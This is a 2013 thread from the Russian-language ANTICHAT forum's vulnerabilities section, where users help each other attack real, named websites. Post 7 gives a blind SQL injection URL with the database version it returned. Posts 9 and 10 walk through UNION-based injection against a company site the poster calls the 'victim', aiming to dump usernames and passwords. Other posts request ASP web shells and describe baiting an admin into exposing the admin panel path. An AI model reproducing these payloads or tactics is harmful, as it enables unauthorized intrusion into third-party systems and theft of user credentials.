HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.07.2013, 08:43
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
Именно так, запросы и через GET тоже идут. Вот и хотелось бы все эти постояннообновляющиеся запросы куда нибудь логировать или парсить в режиме реального времени, возможно ли это как нибудь сделать?
Ну тебе никто не мешает цеплять на страницу /server-status и парсить её содержимое. Хоть запарся.

Единственное что - ты увидешь все запросы как от клиентов, так и от админов, а если сайт высокопосещаемый, то этих запросов будут тысячи, миллионы, сможешь ли ты выловить иголку в стоге сена ???

Самое простое - дождаться когда админ будет в сети, напечатать мат к любой новости и пожаловаться на него. И ждать пока админ его почистит, при этом мониторить /server-status. Если комментарии удаляются через админку - есть шанс увидеть её адрес.
 
Ответить с цитированием

  #2  
Старый 06.07.2013, 01:53
HACKTEAM
Guest
Сообщений: n/a
Провел на форуме:
1049

Репутация: 0
По умолчанию

ходел исправить чара и наткнулся вот на это http://wow-cool.ru/?ajaxZone=1&module=chars&action=repair&repairChar= 237760&repairRelam=fun

что мне с теперь можно с этим делать?

это случайно не скуль инъекция?

прошу не кидать в меня помидорами т.к. я ещё не очень разбираюсь в этом
 
Ответить с цитированием

  #3  
Старый 06.07.2013, 16:20
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от HACKTEAM  
HACKTEAM said:
ходел исправить чара и наткнулся вот на это http://wow-cool.ru/?ajaxZone=1&module=chars&action=repair&repairChar= 237760&repairRelam=fun
что мне с теперь можно с этим делать?
это случайно не скуль инъекция?
прошу не кидать в меня помидорами т.к. я ещё не очень разбираюсь в этом
ничего,но надежда есть всегда. На сервере стоит форум Invision Power Board 3.4,попробуй в привате сплоит поискать

http://forum.wow-cool.ru/admin/upgrade/index.php?app=upgrade&s=&section=index&do=login
 
Ответить с цитированием

  #4  
Старый 08.07.2013, 04:27
zeoman
Новичок
Регистрация: 17.06.2010
Сообщений: 0
Провел на форуме:
430

Репутация: 0
По умолчанию

Возможно не сюда запостил ищу веб шел .ASP веб сервер IIS функционал скромный заливка и правка файлов
 
Ответить с цитированием

  #5  
Старый 08.07.2013, 05:29
Romaz
Guest
Сообщений: n/a
Провел на форуме:
29591

Репутация: 8
По умолчанию

Цитата:
Сообщение от zeoman  
zeoman said:
Возможно не сюда запостил ищу веб шел .ASP веб сервер IIS функционал скромный заливка и правка файлов
/showthread.php?t=103576

https://rdot.org/forum/showthread.php?t=1116
 
Ответить с цитированием

  #6  
Старый 08.07.2013, 12:31
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

http://hawk.ru/toto.php?n_nomer=-3

Можно ли по этой ошибке чо нибудь получить?
 
Ответить с цитированием

  #7  
Старый 08.07.2013, 13:28
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
http://hawk.ru/toto.php?n_nomer=-3
Можно ли по этой ошибке чо нибудь получить?
Можно блиндом получить

http://hawk.ru/toto_stat_day.php?n_kogda=20120904%20and%20(select %20ord(substr(@@version,1,1))%20)=53

5.0.51-log
 
Ответить с цитированием

  #8  
Старый 09.07.2013, 04:44
diker
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

help

Цитата:
Сообщение от asiaman  
asiaman said:
Подскажите, кто-нибудь пользовался данной багой?
Если наглядный пример использования?
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1180
Nginx buffer underflow vulnerability
Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
Affected items
Web Server
The impact of this vulnerability
Remote attackers may execute arbitrary code via crafted HTTP requests.
актуально, что можно с этим сделать
 
Ответить с цитированием

  #9  
Старый 10.07.2013, 01:39
usupekx
Guest
Сообщений: n/a
Провел на форуме:
555

Репутация: 0
По умолчанию

Подскажите:

жертва - ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16

узнаю названия таблиц - ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()

узнаю название столбцов - http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()

на выходе имею такую связку (таблица - user, столбцы - userName,userPass)

ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users

и получаю:

Invalid query: Unknown column 'userPass' in 'field list'

Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её YaBTR и вот вариант рабочий:

ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,grou p_concat(userpwd,0x3a,user rights),version(),4,5+from+users--

Где и как найти эти userpwd,0x3a,user rights
 
Ответить с цитированием

  #10  
Старый 10.07.2013, 01:54
BlackIce
Guest
Сообщений: n/a
Провел на форуме:
18665

Репутация: 27
По умолчанию

Цитата:
Сообщение от usupekx  
usupekx said:
Подскажите:
жертва
- ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16
узнаю названия таблиц
- ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()
узнаю название столбцов
- http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()
на выходе имею такую связку (таблица -
user
, столбцы - userName,userPass)
ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from
users
и получаю:
Invalid query: Unknown column 'userPass' in 'field list'
Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её
YaBTR
и вот вариант рабочий:
ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,grou p_concat(
userpwd,0x3a,user rights
),version(),4,5+from+users--
Где и как найти эти
userpwd,0x3a,user rights
может просто внимательней быть?

>>Где и как найти эти userpwd,0x3a,user rights

0x3a - это хекс код разделителя, а остальные - названия столбцов таблицы. Как найти написано в статье Dr.Zero
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ